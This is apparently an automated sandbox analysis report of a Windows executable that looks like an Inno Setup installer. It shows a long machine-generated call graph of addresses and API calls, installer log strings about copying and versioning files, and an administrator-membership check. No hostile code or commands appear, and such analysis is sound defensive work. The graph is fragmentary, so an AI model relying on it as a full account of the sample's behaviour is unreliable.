46aabf 53767->53769 53768 46af37 53770 46af52 53768->53770 53771 46af83 53768->53771 53769->53768 53772 46ab7a 53769->53772 53776 403494 4 API calls 53769->53776 53775 403494 4 API calls 53770->53775 53773 403494 4 API calls 53771->53773 53774 46ab9b 53772->53774 53778 46abdc 53772->53778 53777 46af91 53773->53777 53779 403494 4 API calls 53774->53779 53780 46af60 53775->53780 53781 46aafe 53776->53781 53871 4694c8 12 API calls 53777->53871 53784 403400 4 API calls 53778->53784 53786 46aba9 53779->53786 53870 4694c8 12 API calls 53780->53870 53783 414af8 4 API calls 53781->53783 53788 46ab1f 53783->53788 53789 46abda 53784->53789 53787 414af8 4 API calls 53786->53787 53791 46abca 53787->53791 53792 403634 4 API calls 53788->53792 53811 46acc0 53789->53811 53853 469bd4 53789->53853 53790 46af6e 53793 403400 4 API calls 53790->53793 53794 403634 4 API calls 53791->53794 53795 46ab2f 53792->53795 53797 46afb4 53793->53797 53794->53789 53799 414af8 4 API calls 53795->53799 53802 403400 4 API calls 53797->53802 53798 46ad48 53800 403400 4 API calls 53798->53800 53803 46ab43 53799->53803 53804 46ad46 53800->53804 53801 46abfc 53805 46ac02 53801->53805 53806 46ac3a 53801->53806 53807 46afbc 53802->53807 53803->53772 53813 414af8 4 API calls 53803->53813 53865 46a010 43 API calls 53804->53865 53809 403494 4 API calls 53805->53809 53808 403400 4 API calls 53806->53808 53810 403420 4 API calls 53807->53810 53812 46ac38 53808->53812 53814 46ac10 53809->53814 53815 46afc9 53810->53815 53811->53798 53816 46ad07 53811->53816 53859 469ec8 53812->53859 53818 46ab6a 53813->53818 53820 47bfd8 43 API calls 53814->53820 53815->53403 53817 403494 4 API calls 53816->53817 53821 46ad15 53817->53821 53822 403634 4 API calls 53818->53822 53824 46ac28 53820->53824 53825 414af8 4 API calls 53821->53825 53822->53772 53823 46ad71 53830 46add2 53823->53830 53831 46ad7c 53823->53831 53827 403634 4 API calls 53824->53827 53828 46ad36 53825->53828 53827->53812 53832 403634 4 API calls 53828->53832 53829 46ac61 53835 46acc2 53829->53835 53836 46ac6c 53829->53836 53834 403400 4 API calls 53830->53834 53833 403494 4 API calls 53831->53833 53832->53804 53842 46ad8a 53833->53842 53837 46adda 53834->53837 53838 403400 4 API calls 53835->53838 53839 403494 4 API calls 53836->53839 53840 46add0 53837->53840 53851 46ae83 53837->53851 53838->53811 53844 46ac7a 53839->53844 53840->53837 53866 494660 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53840->53866 53842->53837 53842->53840 53846 403634 4 API calls 53842->53846 53843 46adfd 53843->53851 53867 49490c 18 API calls 53843->53867 53844->53811 53847 403634 4 API calls 53844->53847 53846->53842 53847->53844 53849 46af24 53869 429154 SendMessageA SendMessageA 53849->53869 53868 429104 SendMessageA 53851->53868 53852->53405 53872 42a050 SendMessageA 53853->53872 53855 469be3 53856 469c03 53855->53856 53873 42a050 SendMessageA 53855->53873 53856->53801 53858 469bf3 53858->53801 53863 469ef5 53859->53863 53860 469f57 53861 403400 4 API calls 53860->53861 53862 469f6c 53861->53862 53862->53829 53863->53860 53874 469e4c 43 API calls 53863->53874 53865->53823 53866->53843 53867->53851 53868->53849 53869->53768 53870->53790 53871->53790 53872->53855 53873->53858 53874->53863 53876 47d9cf 53875->53876 53879 47da0c 53875->53879 53907 455cf8 53876->53907 53879->53411 53881 47da1f 53881->53411 53962 466a80 53882->53962 53885->53417 53887 42f57c 53886->53887 53888 42f59f GetActiveWindow GetFocus 53887->53888 53889 41eeb4 2 API calls 53888->53889 53890 42f5b6 53889->53890 53891 42f5d3 53890->53891 53892 42f5c3 RegisterClassA 53890->53892 53893 42f662 SetFocus 53891->53893 53894 42f5e1 CreateWindowExA 53891->53894 53892->53891 53895 403400 4 API calls 53893->53895 53894->53893 53896 42f614 53894->53896 53897 42f67e 53895->53897 53983 42428c 53896->53983 53902 49490c 18 API calls 53897->53902 53899 42f63c 53900 42f644 CreateWindowExA 53899->53900 53900->53893 53901 42f65a ShowWindow 53900->53901 53901->53893 53902->53455 53989 44b524 53903->53989 53905 466eab 53905->53461 53908 455d09 53907->53908 53909 455d16 53908->53909 53910 455d0d 53908->53910 53941 455adc 29 API calls 53909->53941 53933 4559fc 53910->53933 53913 455d13 53913->53879 53914 47d628 53913->53914 53920 47d726 53914->53920 53923 47d665 53914->53923 53915 47d6c9 53916 403420 4 API calls 53915->53916 53917 47d80e 53916->53917 53917->53881 53918 47954c 19 API calls 53918->53920 53920->53915 53920->53918 53924 47d77c 53920->53924 53921 4797f0 4 API calls 53921->53923 53922 47bfd8 43 API calls 53922->53924 53923->53915 53923->53920 53923->53921 53927 47bfd8 43 API calls 53923->53927 53931 47d6d2 53923->53931 53950 47968c 53923->53950 53924->53920 53924->53922 53926 4540ec 20 API calls 53924->53926 53928 47d713 53924->53928 53925 47bfd8 43 API calls 53925->53931 53926->53924 53927->53923 53928->53915 53929 42c93c 5 API calls 53929->53931 53930 42c964 5 API calls 53930->53931 53931->53923 53931->53925 53931->53928 53931->53929 53931->53930 53961 47d334 52 API calls 53931->53961 53934 42de2c RegOpenKeyExA 53933->53934 53935 455a19 53934->53935 53936 455a67 53935->53936 53942 455930 53935->53942 53936->53913 53939 455930 6 API calls 53940 455a48 RegCloseKey 53939->53940 53940->53913 53941->53913 53947 42dd68 53942->53947 53944 403420 4 API calls 53945 4559e2 53944->53945 53945->53939 53946 455958 53946->53944 53948 42dc10 6 API calls 53947->53948 53949 42dd71 53948->53949 53949->53946 53951 4796a2 53950->53951 53952 47969e 53950->53952 53953 403450 4 API calls 53951->53953 53952->53923 53954 4796af 53953->53954 53955 4796b5 53954->53955 53956 4796cf 53954->53956 53957 47954c 19 API calls 53955->53957 53958 47954c 19 API calls 53956->53958 53959 4796cb 53957->53959 53958->53959 53960 403400 4 API calls 53959->53960 53960->53952 53961->53931 53963 403494 4 API calls 53962->53963 53964 466aae 53963->53964 53965 42dbd8 5 API calls 53964->53965 53966 466ac0 53965->53966 53967 42dbd8 5 API calls 53966->53967 53968 466ad2 53967->53968 53969 46696c 19 API calls 53968->53969 53970 466adc 53969->53970 53971 42dbd8 5 API calls 53970->53971 53972 466aeb 53971->53972 53979 4669e4 53972->53979 53975 42dbd8 5 API calls 53976 466b04 53975->53976 53977 403400 4 API calls 53976->53977 53978 466b19 53977->53978 53978->53414 53980 466a04 53979->53980 53981 4078fc 19 API calls 53980->53981 53982 466a4e 53981->53982 53982->53975 53984 4242be 53983->53984 53985 42429e GetWindowTextA 53983->53985 53987 403494 4 API calls 53984->53987 53986 4034e0 4 API calls 53985->53986 53988 4242bc 53986->53988 53987->53988 53988->53899 53992 44b39c 53989->53992 53991 44b537 53991->53905 53993 44b3cf 53992->53993 53994 414af8 4 API calls 53993->53994 53995 44b3e2 53994->53995 53996 44b40f 73E9A570 53995->53996 53997 40357c 4 API calls 53995->53997 54003 41a1f8 53996->54003 53997->53996 54000 44b440 54011 44b0d0 54000->54011 54002 44b454 73E9A480 54002->53991 54004 41a223 54003->54004 54005 41a2bf 54003->54005 54008 403520 4 API calls 54004->54008 54006 403400 4 API calls 54005->54006 54007 41a2d7 SelectObject 54006->54007 54007->54000 54009 41a27b 54008->54009 54010 41a2b3 CreateFontIndirectA 54009->54010 54010->54005 54012 44b0e7 54011->54012 54013 44b17a 54012->54013 54014 44b163 54012->54014 54015 44b0fa 54012->54015 54013->54002 54016 44b173 DrawTextA 54014->54016 54015->54013 54017 402648 4 API calls 54015->54017 54016->54013 54018 44b10b 54017->54018 54019 44b129 MultiByteToWideChar DrawTextW 54018->54019 54020 402660 4 API calls 54019->54020 54021 44b15b 54020->54021 54021->54002 54024 465643 54022->54024 54023 46571e 54033 4673f8 54023->54033 54024->54023 54028 465693 54024->54028 54045 421a2c 54024->54045 54025 4656d6 54025->54023 54051 4185c8 7 API calls 54025->54051 54028->54025 54029 4656cd 54028->54029 54030 4656d8 54028->54030 54031 421a2c 7 API calls 54029->54031 54032 421a2c 7 API calls 54030->54032 54031->54025 54032->54025 54034 467428 54033->54034 54035 467409 54033->54035 54034->53476 54036 414b28 4 API calls 54035->54036 54037 467417 54036->54037 54038 414b28 4 API calls 54037->54038 54038->54034 54040 46b041 54039->54040 54041 421a2c 7 API calls 54040->54041 54042 46b0cc 54041->54042 54042->53499 54043 466ecc 18 API calls 54042->54043 54043->53499 54044->53500 54047 421a84 54045->54047 54050 421a3a 54045->54050 54047->54028 54049 421a69 54049->54047 54060 421d38 SetFocus GetFocus 54049->54060 54050->54049 54052 408cc4 54050->54052 54051->54023 54053 408cd0 54052->54053 54061 406df4 LoadStringA 54053->54061 54056 403450 4 API calls 54057 408d01 54056->54057 54058 403400 4 API calls 54057->54058 54059 408d16 54058->54059 54059->54049 54060->54047 54062 4034e0 4 API calls 54061->54062 54063 406e21 54062->54063 54063->54056 54065 402648 4 API calls 54064->54065 54066 47dc4c 54065->54066 54067 47d628 61 API calls 54066->54067 54068 47dc6b 54067->54068 54069 47dc7f 54068->54069 54080 47da48 54068->54080 54071 47dcab 54069->54071 54073 402660 4 API calls 54069->54073 54072 402660 4 API calls 54071->54072 54074 47dcb5 54072->54074 54073->54069 54074->53504 54075->53529 54076->53524 54081 403494 4 API calls 54080->54081 54096 47da75 54081->54096 54082 47dad8 54083 47db44 54083->54082 54091 402660 4 API calls 54099 47dac8 54091->54099 54094 42c93c 5 API calls 54094->54096 54096->54094 54096->54099 54100 42e8b0 CharNextA 54096->54100 54099->54082 54099->54083 54099->54091 54100->54096 54103 46ca4d 54102->54103 54104 46ca9a 54103->54104 54105 414af8 4 API calls 54103->54105 54107 403420 4 API calls 54104->54107 54106 46ca63 54105->54106 54301 466c90 6 API calls 54106->54301 54109 46cb44 54107->54109 54109->53556 54293 408be8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 54109->54293 54110 46ca6b 54111 414b28 4 API calls 54110->54111 54112 46ca79 54111->54112 54113 46ca86 54112->54113 54116 46ca9f 54112->54116 54302 47eadc 42 API calls 54113->54302 54115 46cab7 54303 47eadc 42 API calls 54115->54303 54116->54115 54117 466d74 CharNextA 54116->54117 54119 46cab3 54117->54119 54119->54115 54120 46cacd 54119->54120 54121 46cad3 54120->54121 54122 46cae9 54120->54122 54304 47eadc 42 API calls 54121->54304 54124 42c9ac CharNextA 54122->54124 54125 46caf6 54124->54125 54125->54104 54305 466e00 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54125->54305 54127 46cb0d 54128 451444 4 API calls 54127->54128 54129 46cb1a 54128->54129 54306 47eadc 42 API calls 54129->54306 54132 481f8d 54131->54132 54133 481f5f 54131->54133 54135 475dbc 54132->54135 54307 4946bc 18 API calls 54133->54307 54136 457b4c 24 API calls 54135->54136 54137 475e08 54136->54137 54138 4072b0 SetCurrentDirectoryA 54137->54138 54139 475e12 54138->54139 54308 46e5b0 54139->54308 54143 475e22 54294->53564 54301->54110 54302->54104 54303->54104 54304->54104 54305->54127 54306->54104 54307->54132 54309 46e623 54308->54309 54311 46e5cd 54308->54311 54312 46e628 54309->54312 54310 47968c 19 API calls 54310->54311 54311->54309 54311->54310 54313 46e64e 54312->54313 54756 44fb08 54313->54756 54315 46e6aa 54315->54143 54759 44fb1c 54756->54759 54760 44fb2d 54759->54760 54761 44fb19 54760->54761 54762 44fb57 MulDiv 54760->54762 54761->54315 54763 4181f0 54762->54763 54764 44fb82 SendMessageA 54763->54764 54764->54761 56176 498578 56234 403344 56176->56234 56178 498586 56237 4056a0 56178->56237 56180 49858b 56240 406334 GetModuleHandleA GetProcAddress 56180->56240 56186 49859a 56257 410964 56186->56257 56188 49859f 56261 412938 56188->56261 56190 4985a9 56266 419050 GetVersion 56190->56266 56507 4032fc 56234->56507 56236 403349 GetModuleHandleA GetCommandLineA 56236->56178 56239 4056db 56237->56239 56508 4033bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56237->56508 56239->56180 56241 406350 56240->56241 56242 406357 GetProcAddress 56240->56242 56241->56242 56243 406366 56242->56243 56244 40636d GetProcAddress 56242->56244 56243->56244 56245 406380 56244->56245 56246 40637c SetProcessDEPPolicy 56244->56246 56247 409954 56245->56247 56246->56245 56509 40902c 56247->56509 56252 408728 7 API calls 56253 409977 56252->56253 56524 409078 GetVersionExA 56253->56524 56256 409b88 6F9C1CD0 56256->56186 56258 41096e 56257->56258 56259 4109ad GetCurrentThreadId 56258->56259 56260 4109c8 56259->56260 56260->56188 56526 40af0c 56261->56526 56265 412964 56265->56190 56538 41de34 8 API calls 56266->56538 56268 419069 56540 418f48 GetCurrentProcessId 56268->56540 56507->56236 56508->56239 56510 408cc4 5 API calls 56509->56510 56511 40903d 56510->56511 56512 4085e4 GetSystemDefaultLCID 56511->56512 56516 40861a 56512->56516 56513 408570 LocalAlloc TlsSetValue TlsGetValue TlsGetValue GetLocaleInfoA 56513->56516 56514 403450 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56514->56516 56515 406df4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56515->56516 56516->56513 56516->56514 56516->56515 56520 40867c 56516->56520 56517 403450 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56517->56520 56518 406df4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56518->56520 56519 408570 LocalAlloc TlsSetValue TlsGetValue TlsGetValue GetLocaleInfoA 56519->56520 56520->56517 56520->56518 56520->56519 56521 4086ff 56520->56521 56522 403420 4 API calls 56521->56522 56523 408719 56522->56523 56523->56252 56525 40908f 56524->56525 56525->56256 56527 40af13 56526->56527 56528 40af32 56527->56528 56537 40ae44 19 API calls 56527->56537 56530 41101c 56528->56530 56531 41103e 56530->56531 56532 406df4 5 API calls 56531->56532 56533 403450 4 API calls 56531->56533 56534 41105d 56531->56534 56532->56531 56533->56531 56535 403400 4 API calls 56534->56535 56536 411072 56535->56536 56536->56265 56537->56527 56539 41deae 56538->56539 56539->56268 56556 4078c8 56540->56556 57815 42f530 57816 42f53b 57815->57816 57817 42f53f NtdllDefWindowProc_A 57815->57817 57817->57816 55808 416b52 55809 416bfa 55808->55809 55810 416b6a 55808->55810 55827 41532c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 55809->55827 55812 416b84 SendMessageA 55810->55812 55813 416b78 55810->55813 55823 416bd8 55812->55823 55814 416b82 CallWindowProcA 55813->55814 55815 416b9e 55813->55815 55814->55823 55824 41a068 GetSysColor 55815->55824 55818 416ba9 SetTextColor 55819 416bbe 55818->55819 55825 41a068 GetSysColor 55819->55825 55821 416bc3 SetBkColor 55826 41a6f0 GetSysColor CreateBrushIndirect 55821->55826 55824->55818 55825->55821 55826->55823 55827->55823 57818 4358f0 57819 435905 57818->57819 57823 43591f 57819->57823 57824 4352d8 57819->57824 57828 435322 57824->57828 57829 435308 57824->57829 57825 403400 4 API calls 57826 435727 57825->57826 57826->57823 57837 435738 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 57826->57837 57827 446db4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 57827->57829 57828->57825 57829->57827 57829->57828 57830 402648 4 API calls 57829->57830 57831 4038a4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 57829->57831 57833 431cb0 4 API calls 57829->57833 57834 403450 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 57829->57834 57835 403744 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 57829->57835 57838 4343c0 57829->57838 57850 434b84 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 57829->57850 57830->57829 57831->57829 57833->57829 57834->57829 57835->57829 57837->57823 57839 43447d 57838->57839 57840 4343ed 57838->57840 57869 434320 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 57839->57869 57841 403494 4 API calls 57840->57841 57843 4343fb 57841->57843 57844 403778 4 API calls 57843->57844 57848 43441c 57844->57848 57845 403400 4 API calls 57846 4344cd 57845->57846 57846->57829 57847 43446f 57847->57845 57848->57847 57851 494314 57848->57851 57850->57829 57852 49434c 57851->57852 57853 4943e4 57851->57853 57854 403494 4 API calls 57852->57854 57870 448940 57853->57870 57859 494357 57854->57859 57856 494367 57857 403400 4 API calls 57856->57857 57858 494408 57857->57858 57860 403400 4 API calls 57858->57860 57859->57856 57861 4037b8 4 API calls 57859->57861 57862 494410 57860->57862 57863 494380 57861->57863 57862->57848 57863->57856 57864 4037b8 4 API calls 57863->57864 57865 4943a3 57864->57865 57866 403778 4 API calls 57865->57866 57867 4943d4 57866->57867 57868 403634 4 API calls 57867->57868 57868->57853 57869->57847 57871 448965 57870->57871 57881 4489a8 57870->57881 57872 403494 4 API calls 57871->57872 57874 448970 57872->57874 57877 4037b8 4 API calls 57874->57877 57875 4489bc 57876 403400 4 API calls 57875->57876 57878 4489ef 57876->57878 57879 44898c 57877->57879 57878->57856 57880 4037b8 4 API calls 57879->57880 57880->57881 57881->57875 57882 44853c 57881->57882 57883 403494 4 API calls 57882->57883 57884 448572 57883->57884 57885 4037b8 4 API calls 57884->57885 57886 448584 57885->57886 57887 403778 4 API calls 57886->57887 57888 4485a5 57887->57888 57889 4037b8 4 API calls 57888->57889 57890 4485bd 57889->57890 57891 403778 4 API calls 57890->57891 57892 4485e8 57891->57892 57893 4037b8 4 API calls 57892->57893 57895 448600 57893->57895 57894 4486d3 57899 4486db GetProcAddress 57894->57899 57895->57894 57897 44865b LoadLibraryExA 57895->57897 57898 44866d LoadLibraryA 57895->57898 57902 448638 57895->57902 57903 403b80 4 API calls 57895->57903 57904 403450 4 API calls 57895->57904 57906 43da98 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 57895->57906 57896 403420 4 API calls 57900 448718 57896->57900 57897->57895 57898->57895 57901 4486ee 57899->57901 57900->57875 57901->57902 57902->57896 57903->57895 57904->57895 57906->57895 57907 40ce34 57910 406f18 WriteFile 57907->57910 57911 406f35 57910->57911 55828 416654 55829 416661 55828->55829 55830 4166bb 55828->55830 55836 416560 CreateWindowExA 55829->55836 55837 4162da 55829->55837 55831 416668 SetPropA SetPropA 55831->55830 55832 41669b 55831->55832 55833 4166ae SetWindowPos 55832->55833 55833->55830 55836->55831 55838 416306 55837->55838 55839 4162e6 GetClassInfoA 55837->55839 55838->55831 55839->55838 55840 4162fa GetClassInfoA 55839->55840 55840->55838 57912 4222f4 57913 422303 57912->57913 57918 421284 57913->57918 57916 422323 57919 4212f3 57918->57919 57933 421293 57918->57933 57922 421304 57919->57922 57943 4124e0 GetMenuItemCount GetMenuStringA GetMenuState 57919->57943 57921 421332 57925 4213a5 57921->57925 57930 42134d 57921->57930 57922->57921 57924 4213ca 57922->57924 57923 4213a3 57926 4213f6 57923->57926 57945 421e3c 11 API calls 57923->57945 57924->57923 57928 4213de SetMenu 57924->57928 57925->57923 57932 4213b9 57925->57932 57946 4211cc 10 API calls 57926->57946 57928->57923 57930->57923 57936 421370 GetMenu 57930->57936 57931 4213fd 57931->57916 57941 4221f8 10 API calls 57931->57941 57935 4213c2 SetMenu 57932->57935 57933->57919 57942 408d34 19 API calls 57933->57942 57935->57923 57937 421393 57936->57937 57938 42137a 57936->57938 57944 4124e0 GetMenuItemCount GetMenuStringA GetMenuState 57937->57944 57940 42138d SetMenu 57938->57940 57940->57937 57941->57916 57942->57933 57943->57922 57944->57923 57945->57926 57946->57931 57947 44b4b8 57948 44b4c6 57947->57948 57950 44b4e5 57947->57950 57949 44b39c 11 API calls 57948->57949 57948->57950 57949->57950 57951 448738 57952 448766 57951->57952 57953 44876d 57951->57953 57955 403400 4 API calls 57952->57955 57954 448781 57953->57954 57956 44853c 7 API calls 57953->57956 57954->57952 57957 403494 4 API calls 57954->57957 57959 448917 57955->57959 57956->57954 57958 44879a 57957->57958 57960 4037b8 4 API calls 57958->57960 57961 4487b6 57960->57961 57962 4037b8 4 API calls 57961->57962 57963 4487d2 57962->57963 57963->57952 57964 4487e6 57963->57964 57965 4037b8 4 API calls 57964->57965 57966 448800 57965->57966 57967 431be0 4 API calls 57966->57967 57968 448822 57967->57968 57969 431cb0 4 API calls 57968->57969 57974 448842 57968->57974 57969->57968 57970 448898 57983 442344 57970->57983 57972 448880 57972->57970 57995 4435e0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 57972->57995 57974->57972 57994 4435e0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 57974->57994 57976 4488cc GetLastError 57996 4484d0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 57976->57996 57978 4488db 57997 443620 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 57978->57997 57980 4488f0 57998 443630 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 57980->57998 57982 4488f8 57984 443322 57983->57984 57985 44237d 57983->57985 57987 403400 4 API calls 57984->57987 57986 403400 4 API calls 57985->57986 57988 442385 57986->57988 57989 443337 57987->57989 57990 431be0 4 API calls 57988->57990 57989->57976 57991 442391 57990->57991 57992 443312 57991->57992 57999 441a1c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 57991->57999 57992->57976 57994->57974 57995->57970 57996->57978 57997->57980 57998->57982 57999->57991 58000 4165fc 73EA5CF0 58001 42e3ff SetErrorMode

                                                                                Executed Functions

                                                                                Function 00470950 Relevance: 78.0, APIs: 4, Strings: 40, Instructions: 956COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                • Version of our file: %u.%u.%u.%u, xrefs: 00470D98
                                                                                • Time stamp of existing file: %s, xrefs: 00470CD3
                                                                                • Time stamp of existing file: (failed to read), xrefs: 00470CDF
                                                                                • Failed to read existing file's SHA-1 hash. Proceeding., xrefs: 00470F78
                                                                                • InUn, xrefs: 004713ED
                                                                                • Time stamp of our file: %s, xrefs: 00470C43
                                                                                • Dest filename: %s, xrefs: 00470B3C
                                                                                • Time stamp of our file: (failed to read), xrefs: 00470C4F
                                                                                • Skipping due to "onlyifdestfileexists" flag., xrefs: 004711A2
                                                                                • Incrementing shared file count (64-bit)., xrefs: 0047181A
                                                                                • Existing file has a later time stamp. Skipping., xrefs: 00471077
                                                                                • Failed to strip read-only attribute., xrefs: 0047117B
                                                                                • Uninstaller requires administrator: %s, xrefs: 0047141D
                                                                                • Will register the file (a type library) later., xrefs: 004717A1
                                                                                • -- File entry --, xrefs: 004709A3
                                                                                • Dest file exists., xrefs: 00470C63
                                                                                • Existing file is a newer version. Skipping., xrefs: 00470EAA
                                                                                • Existing file's SHA-1 hash is different from our file. Proceeding., xrefs: 00470F6C
                                                                                • Existing file's SHA-1 hash matches our file. Skipping., xrefs: 00470F5D
                                                                                • Couldn't read time stamp. Skipping., xrefs: 00470FDD
                                                                                • Non-default bitness: 32-bit, xrefs: 00470B63
                                                                                • Version of existing file: (none), xrefs: 00470FA2
                                                                                • User opted not to overwrite the existing file. Skipping., xrefs: 004710F5
                                                                                • Same version. Skipping., xrefs: 00470F8D
                                                                                • Non-default bitness: 64-bit, xrefs: 00470B57
                                                                                • Version of existing file: %u.%u.%u.%u, xrefs: 00470E24
                                                                                • Installing into GAC, xrefs: 004719A2
                                                                                • Skipping due to "onlyifdoesntexist" flag., xrefs: 00470C76
                                                                                • Stripped read-only attribute., xrefs: 0047116F
                                                                                • Dest file is protected by Windows File Protection., xrefs: 00470B95
                                                                                • Version of our file: (none), xrefs: 00470DA4
                                                                                • Will register the file (a DLL/OCX) later., xrefs: 004717AD
                                                                                • , xrefs: 00470E77, 00471048, 004710C6
                                                                                • User opted not to strip the existing file's read-only attribute. Skipping., xrefs: 0047113E
                                                                                • Existing file is protected by Windows File Protection. Skipping., xrefs: 00471094
                                                                                • Same time stamp. Skipping., xrefs: 00470FFD
                                                                                • @, xrefs: 00470A58
                                                                                • Installing the file., xrefs: 004711B1
                                                                                • .tmp, xrefs: 0047125F
                                                                                • Incrementing shared file count (32-bit)., xrefs: 00471833
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: $-- File entry --$.tmp$@$Couldn't read time stamp. Skipping.$Dest file exists.$Dest file is protected by Windows File Protection.$Dest filename: %s$Existing file has a later time stamp. Skipping.$Existing file is a newer version. Skipping.$Existing file is protected by Windows File Protection. Skipping.$Existing file's SHA-1 hash is different from our file. Proceeding.$Existing file's SHA-1 hash matches our file. Skipping.$Failed to read existing file's SHA-1 hash. Proceeding.$Failed to strip read-only attribute.$InUn$Incrementing shared file count (32-bit).$Incrementing shared file count (64-bit).$Installing into GAC$Installing the file.$Non-default bitness: 32-bit$Non-default bitness: 64-bit$Same time stamp. Skipping.$Same version. Skipping.$Skipping due to "onlyifdestfileexists" flag.$Skipping due to "onlyifdoesntexist" flag.$Stripped read-only attribute.$Time stamp of existing file: %s$Time stamp of existing file: (failed to read)$Time stamp of our file: %s$Time stamp of our file: (failed to read)$Uninstaller requires administrator: %s$User opted not to overwrite the existing file. Skipping.$User opted not to strip the existing file's read-only attribute. Skipping.$Version of existing file: %u.%u.%u.%u$Version of existing file: (none)$Version of our file: %u.%u.%u.%u$Version of our file: (none)$Will register the file (a DLL/OCX) later.$Will register the file (a type library) later.
                                                                                • API String ID: 0-4021121268
                                                                                • Opcode ID: 37ba39076e8f210f702745b7d33ab1b6cbc29d83952fc568139b6c082dd49221
                                                                                • Instruction ID: 00dcbbebc37e67597ddb11db3b00c056d98a3663d13b65a1c96947d1bb872b77
                                                                                • Opcode Fuzzy Hash: 37ba39076e8f210f702745b7d33ab1b6cbc29d83952fc568139b6c082dd49221
                                                                                • Instruction Fuzzy Hash: 2C927534A04288DFDB11DFA9C845BDDBBB5AF05304F5480ABE848AB392C7789E45CB59
                                                                                Function 0042E0AC Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 178memorylibraryloaderCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1546 42e0ac-42e0bd 1547 42e0c8-42e0ed AllocateAndInitializeSid 1546->1547 1548 42e0bf-42e0c3 1546->1548 1549 42e297-42e29f 1547->1549 1550 42e0f3-42e110 GetVersion 1547->1550 1548->1549 1551 42e112-42e127 GetModuleHandleA GetProcAddress 1550->1551 1552 42e129-42e12b 1550->1552 1551->1552 1553 42e152-42e16c GetCurrentThread OpenThreadToken 1552->1553 1554 42e12d-42e13b CheckTokenMembership 1552->1554 1557 42e1a3-42e1cb GetTokenInformation 1553->1557 1558 42e16e-42e178 GetLastError 1553->1558 1555 42e141-42e14d 1554->1555 1556 42e279-42e28f FreeSid 1554->1556 1555->1556 1559 42e1e6-42e20a call 402648 GetTokenInformation 1557->1559 1560 42e1cd-42e1d5 GetLastError 1557->1560 1561 42e184-42e197 GetCurrentProcess OpenProcessToken 1558->1561 1562 42e17a-42e17f call 4031bc 1558->1562 1573 42e218-42e220 1559->1573 1574 42e20c-42e216 call 4031bc * 2 1559->1574 1560->1559 1564 42e1d7-42e1e1 call 4031bc * 2 1560->1564 1561->1557 1563 42e199-42e19e call 4031bc 1561->1563 1562->1549 1563->1549 1564->1549 1576 42e222-42e223 1573->1576 1577 42e253-42e271 call 402660 CloseHandle 1573->1577 1574->1549 1580 42e225-42e238 EqualSid 1576->1580 1584 42e23a-42e247 1580->1584 1585 42e24f-42e251 1580->1585 1584->1585 1588 42e249-42e24d 1584->1588 1585->1577 1585->1580 1588->1577
                                                                                APIs
                                                                                • AllocateAndInitializeSid.ADVAPI32(00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E0E6
                                                                                • GetVersion.KERNEL32(00000000,0042E290,?,00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E103
                                                                                • GetModuleHandleA.KERNEL32(advapi32.dll,CheckTokenMembership,00000000,0042E290,?,00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E11C
                                                                                • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042E122
                                                                                • CheckTokenMembership.KERNELBASE(00000000,00000000,?,00000000,0042E290,?,00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E137
                                                                                • FreeSid.ADVAPI32(00000000,0042E297,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E28A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
